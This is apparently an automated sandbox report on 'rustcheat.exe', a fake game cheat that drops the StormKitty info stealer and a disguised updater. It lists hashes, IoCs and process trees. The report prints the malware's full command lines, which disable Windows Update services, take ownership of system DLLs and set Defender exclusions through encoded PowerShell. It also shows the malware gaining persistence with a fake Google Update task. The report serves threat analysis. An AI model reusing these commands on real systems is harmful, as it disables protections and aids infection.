Analysis
- max time kernel: 135s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20230712-en
- resource tags: arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system
- submitted: 12-08-2023 12:40
- Static task: static1
- Behavioral task: behavioral1
- Sample: rustcheat.exe
- Resource: win7-20230712-en
General
- Target: rustcheat.exe
- Size: 4.4MB
- MD5: 50c839c62f01c2f2be0ff9eacdca3c84
- SHA1: e747243b3d708857799e3d172412d5c8af99b02e
- SHA256: d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
- SHA512: 1af308ce12056c988cdb5f50603e30357bfa7cc8a0c1d35b1a72e522fdcce23ddbd86c40b6a030a3ddafb1d01518edb511076e3b86e4c2af555d792824dec091
- SSDEEP: 98304:AV5/ubyrtiqzCy/5Tinwrnkw1/Qbhy0l/H9kx5TKMglVRA:Azub4l9/5JYKYbJ59kx5OMaVRA
Malware Config
Signatures

Modifies security service (2 TTPs, 2 IoCs)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)

StormKitty
StormKitty is an open source info stealer written in C#.

StormKitty payload (7 IoCs)
resource / yara_rule:
- behavioral1/files/0x000a00000001223c-66.dat: family_stormkitty
- behavioral1/files/0x000a00000001223c-64.dat: family_stormkitty
- behavioral1/files/0x000a00000001223c-67.dat: family_stormkitty
- behavioral1/memory/2632-68-0x000000013F740000-0x000000013F790000-memory.dmp: family_stormkitty
- behavioral1/memory/2632-72-0x0000000002160000-0x00000000021D4000-memory.dmp: family_stormkitty
- behavioral1/memory/2232-73-0x000000001B380000-0x000000001B400000-memory.dmp: family_stormkitty
- behavioral1/memory/2232-87-0x000000001B380000-0x000000001B400000-memory.dmp: family_stormkitty

Downloads MZ/PE file

Possible privilege escalation attempt (6 IoCs)
pid / Process:
- 2908 icacls.exe
- 1496 takeown.exe
- 2900 icacls.exe
- 2072 takeown.exe
- 2464 icacls.exe
- 2144 takeown.exe

Stops running service(s) (3 TTPs)

Executes dropped EXE (4 IoCs)
pid / Process:
- 2232 testy.exe
- 2632 StormKittyBuild.exe
- 1900 updater.exe
- 2948 updater.exe

Loads dropped DLL (4 IoCs)
pid / Process:
- 2588 rustcheat.exe
- 2588 rustcheat.exe
- 2124 taskeng.exe
- 2028 conhost.exe

Modifies file permissions (1 TTPs, 6 IoCs)
pid / Process:
- 1496 takeown.exe
- 2900 icacls.exe
- 2072 takeown.exe
- 2464 icacls.exe
- 2144 takeown.exe
- 2908 icacls.exe

resource / yara_rule:
- behavioral1/files/0x000600000001945d-98.dat: vmprotect
- behavioral1/files/0x000600000001945d-124.dat: vmprotect

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
- 7: ip-api.com

Drops file in System32 directory (4 IoCs)
description / ioc / Process:
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe); the same entry is recorded 4 times
Launches sc.exe (15 IoCs)
Sc.exe is a Windows utility to control services on the system.
pid / Process:
- sc.exe: 2876, 1804, 2728, 880, 2328, 2576, 2564, 2268, 2012, 2220, 2500, 2760, 2436, 2020, 2348
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process:
- 2500 schtasks.exe

Delays execution with timeout.exe (1 IoCs)
pid / Process:
- 1524 timeout.exe

Kills process with taskkill (1 IoCs)
pid / Process:
- 1812 taskkill.exe

Modifies registry key (1 TTPs, 27 IoCs)
pid / Process:
- reg.exe: 2596, 1972, 3052, 2404, 840, 1124, 2540, 2224, 1680, 1668, 2412, 2392, 2952, 2372, 2568, 1928, 1724, 1720, 3036, 2112, 1632, 2688, 2652, 280, 1520, 3012, 1140

Modifies system certificate store
description / ioc / Process:
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 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 (StormKittyBuild.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (StormKittyBuild.exe)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid / Process:
- 1920 powershell.exe
- 2232 testy.exe
- 1744 powershell.exe
- 1900 updater.exe
- 2352 powershell.exe
- 2940 powershell.exe
- 2948 updater.exe

Suspicious use of AdjustPrivilegeToken (23 IoCs)
description / pid / Process:
- Token: SeDebugPrivilege, 1920 powershell.exe
- Token: SeDebugPrivilege, 2632 StormKittyBuild.exe
- Token: SeShutdownPrivilege, 2720 powercfg.exe
- Token: SeDebugPrivilege, 2232 testy.exe
- Token: SeShutdownPrivilege, 2784 powercfg.exe
- Token: SeShutdownPrivilege, 2712 powercfg.exe
- Token: SeShutdownPrivilege, 1784 powercfg.exe
- Token: SeTakeOwnershipPrivilege, 1496 takeown.exe
- Token: SeDebugPrivilege, 1812 taskkill.exe
- Token: SeDebugPrivilege, 1744 powershell.exe
- Token: SeDebugPrivilege, 1900 updater.exe
- Token: SeShutdownPrivilege, 1828 powercfg.exe
- Token: SeShutdownPrivilege, 2276 powercfg.exe
- Token: SeShutdownPrivilege, 2084 powercfg.exe
- Token: SeTakeOwnershipPrivilege, 2072 takeown.exe
- Token: SeDebugPrivilege, 2352 powershell.exe
- Token: SeDebugPrivilege, 2940 powershell.exe
- Token: SeDebugPrivilege, 2948 updater.exe
- Token: SeShutdownPrivilege, 2832 powercfg.exe
- Token: SeShutdownPrivilege, 2240 powercfg.exe
- Token: SeShutdownPrivilege, 1532 powercfg.exe
- Token: SeShutdownPrivilege, 1768 powercfg.exe
- Token: SeTakeOwnershipPrivilege, 2144 takeown.exe

Suspicious use of WriteProcessMemory (64 IoCs; identical rows are listed once with their count)
description / pid / Process / procid_target:
- PID 2588 wrote to memory of 2232 (rustcheat.exe, target 28), 4 rows
- PID 2588 wrote to memory of 2632 (rustcheat.exe, target 29), 4 rows
- PID 2232 wrote to memory of 1920 (testy.exe, target 30), 3 rows
- PID 2232 wrote to memory of 2132 (testy.exe, target 33), 3 rows
- PID 2232 wrote to memory of 2732 (testy.exe, target 35), 3 rows
- PID 2132 wrote to memory of 2876 (cmd.exe, target 36), 3 rows
- PID 2132 wrote to memory of 1804 (cmd.exe, target 38), 3 rows
- PID 2732 wrote to memory of 2720 (cmd.exe, target 39), 3 rows
- PID 2132 wrote to memory of 2728 (cmd.exe, target 40), 3 rows
- PID 2132 wrote to memory of 2760 (cmd.exe, target 41), 3 rows
- PID 2732 wrote to memory of 2784 (cmd.exe, target 42), 3 rows
- PID 2132 wrote to memory of 2436 (cmd.exe, target 43), 3 rows
- PID 2132 wrote to memory of 2372 (cmd.exe, target 44), 3 rows
- PID 2132 wrote to memory of 1632 (cmd.exe, target 45), 3 rows
- PID 2732 wrote to memory of 2712 (cmd.exe, target 46), 3 rows
- PID 2132 wrote to memory of 840 (cmd.exe, target 47), 3 rows
- PID 2132 wrote to memory of 2688 (cmd.exe, target 48), 3 rows
- PID 2132 wrote to memory of 2596 (cmd.exe, target 49), 3 rows
- PID 2732 wrote to memory of 1784 (cmd.exe, target 50), 3 rows
- PID 2132 wrote to memory of 1496 (cmd.exe, target 51), 3 rows
- PID 2132 wrote to memory of 2900 (cmd.exe, target 52), 2 rows
Processes
Each entry gives the image path, PID, command line and, in brackets, the signatures the sandbox attached to that process; nesting shows the parent/child relationship.

- C:\Users\Admin\AppData\Local\Temp\rustcheat.exe (PID 2588): "C:\Users\Admin\AppData\Local\Temp\rustcheat.exe" [Loads dropped DLL; Suspicious use of WriteProcessMemory]
  - C:\Users\Admin\AppData\Local\Temp\testy.exe (PID 2232): "C:\Users\Admin\AppData\Local\Temp\testy.exe" [Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory]
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1920): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A" [Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\cmd.exe (PID 2132): "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE [Suspicious use of WriteProcessMemory]
      - C:\Windows\system32\sc.exe (PID 2876): sc stop UsoSvc [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 1804): sc stop WaaSMedicSvc [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2728): sc stop wuauserv [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2760): sc stop bits [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2436): sc stop dosvc [Launches sc.exe]
      - C:\Windows\system32\reg.exe (PID 2372): reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1632): reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 840): reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f [Modifies security service; Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 2688): reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 2596): reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f [Modifies registry key]
      - C:\Windows\system32\takeown.exe (PID 1496): takeown /f C:\Windows\System32\WaaSMedicSvc.dll [Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\icacls.exe (PID 2900): icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q [Possible privilege escalation attempt; Modifies file permissions]
      - C:\Windows\system32\reg.exe (PID 3012): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1928): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1140): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1124): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\schtasks.exe (PID 1696): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2024): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 1076): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 1960): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 3004): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2488): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 1752): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - C:\Windows\System32\cmd.exe (PID 2732): "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 [Suspicious use of WriteProcessMemory]
      - C:\Windows\system32\powercfg.exe (PID 2720): powercfg /x -hibernate-timeout-ac 0 [Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\powercfg.exe (PID 2784): powercfg /x -hibernate-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\powercfg.exe (PID 2712): powercfg /x -standby-timeout-ac 0 [Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\powercfg.exe (PID 1784): powercfg /x -standby-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\cmd.exe (PID 1704): "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""
      - C:\Windows\system32\schtasks.exe (PID 2500): schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\"" [Creates scheduled task(s)]
    - C:\Windows\System32\cmd.exe (PID 2348): "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      - C:\Windows\system32\schtasks.exe (PID 2032): schtasks /run /tn "GoogleUpdateTaskMachineQC"
  - C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe (PID 2632): "C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe" [Executes dropped EXE; Modifies system certificate store; Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\cmd.exe (PID 1344): "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat
      - C:\Windows\system32\chcp.com (PID 2540): chcp 65001
      - C:\Windows\system32\taskkill.exe (PID 1812): TaskKill /F /IM 2632 [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\timeout.exe (PID 1524): Timeout /T 2 /Nobreak [Delays execution with timeout.exe]
- C:\Windows\system32\taskeng.exe (PID 2124): taskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1] [Loads dropped DLL]
  - C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe (PID 1900): C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe [Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1744): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A" [Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\cmd.exe (PID 760): "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - C:\Windows\system32\sc.exe (PID 2576): sc stop UsoSvc [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 880): sc stop WaaSMedicSvc [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2328): sc stop wuauserv [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2564): sc stop bits [Launches sc.exe]
      - C:\Windows\system32\sc.exe (PID 2220): sc stop dosvc [Launches sc.exe]
      - C:\Windows\system32\reg.exe (PID 1724): reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1680): reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1972): reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 2652): reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 1720): reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f [Modifies registry key]
      - C:\Windows\system32\takeown.exe (PID 2072): takeown /f C:\Windows\System32\WaaSMedicSvc.dll [Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\icacls.exe (PID 2464): icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q [Possible privilege escalation attempt; Modifies file permissions]
      - C:\Windows\system32\reg.exe (PID 3036): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 3052): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 2412): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\reg.exe (PID 2392): reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f [Modifies registry key]
      - C:\Windows\system32\schtasks.exe (PID 1264): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2864): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 1756): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2792): SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2796): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2840): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - C:\Windows\system32\schtasks.exe (PID 2868): SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - C:\Windows\System32\cmd.exe (PID 2432): "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - C:\Windows\system32\powercfg.exe (PID 1828): powercfg /x -hibernate-timeout-ac 0 [Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\powercfg.exe (PID 2276): powercfg /x -hibernate-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
      - C:\Windows\system32\powercfg.exe (PID 2600): powercfg /x -standby-timeout-ac 0
      - C:\Windows\system32\powercfg.exe (PID 2084): powercfg /x -standby-timeout-dc 0 [Suspicious use of AdjustPrivilegeToken]
    - C:\Windows\System32\conhost.exe (PID 2028): C:\Windows\System32\conhost.exe "ofrnufvwokgx" [Loads dropped DLL]
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2352): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA==" [Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
      - C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe (PID 2948): "C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe" [Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2940): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A" [Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken]
        - C:\Windows\System32\cmd.exe (PID 2976): "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          - C:\Windows\system32\sc.exe (PID 2268): sc stop UsoSvc [Launches sc.exe]
          - C:\Windows\system32\sc.exe (PID 2020): sc stop WaaSMedicSvc [Launches sc.exe]
          - C:\Windows\system32\sc.exe (PID 2500): sc stop wuauserv [Launches sc.exe]
          - C:\Windows\system32\sc.exe (PID 2012): sc stop bits [Launches sc.exe]
          - C:\Windows\system32\sc.exe (PID 2348): sc stop dosvc [Launches sc.exe]
          - C:\Windows\system32\reg.exe (PID 2112): reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 280): reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 2540): reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 2404): reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f [Modifies registry key]
          - C:\Windows\system32\reg.exe (PID 2952): reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f [Modifies registry key]
